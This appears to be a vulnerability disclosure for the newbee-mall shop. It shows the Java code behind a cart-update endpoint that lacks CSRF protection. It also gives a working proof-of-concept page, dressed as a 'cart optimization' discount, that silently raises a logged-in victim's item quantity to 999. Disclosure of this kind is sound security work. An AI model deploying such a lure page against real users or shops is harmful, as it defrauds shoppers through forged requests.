CSRF Vulnerability in Shopping Cart Item Update #111

@flashzyc

Summary

A CSRF vulnerability exists in the shopping cart update endpoint /shop-cart (PUT). Attackers can modify the quantity of items in users' shopping carts, potentially increasing order values significantly.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Autowired
    private HandlerInterceptor newBeeMallLoginInterceptor; // login check only; declared type assumed
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF protection: only the session cookie is checked, and browsers attach it to cross-site requests
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java (Lines 78-91)

@PutMapping("/shop-cart")
@ResponseBody
public Result updateNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
                                               HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    newBeeMallShoppingCartItem.setUserId(user.getUserId());
    // ❌ No CSRF token validation
    // ⚠️ Any site the victim visits can trigger this update with the victim's session cookie
    String updateResult = newBeeMallShoppingCartService.updateNewBeeMallCartItem(newBeeMallShoppingCartItem);
    if (ServiceResultEnum.SUCCESS.getResult().equals(updateResult)) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(updateResult);
}

Security Issues:

  1. ❌ No CSRF token validation
  2. ⚠️ Can drastically increase item quantities
  3. ⚠️ Leads to inflated order values

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Cart Optimization</title>
</head>
<body>
    <h2>🛒 Optimizing your shopping cart...</h2>
    <p>Please wait while we apply discounts.</p>
    
    <script>
        // Increase quantity of all cart items to maximum
        fetch('http://localhost:28089/shop-cart', {
            method: 'PUT',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                cartItemId: 1,      // Target cart item
                goodsCount: 999,    // Set to maximum quantity
                goodsId: 10001
            })
        })
        .then(response => response.json())
        .then(data => {
            document.body.innerHTML = '<h3>✅ Cart optimized!</h3>';
        });
    </script>
</body>
</html>

Impact

Shopping cart manipulation leading to inflated charges: users may unknowingly check out with drastically increased item quantities, resulting in unexpectedly high charges.

CVSS Score: 7.1 (High)
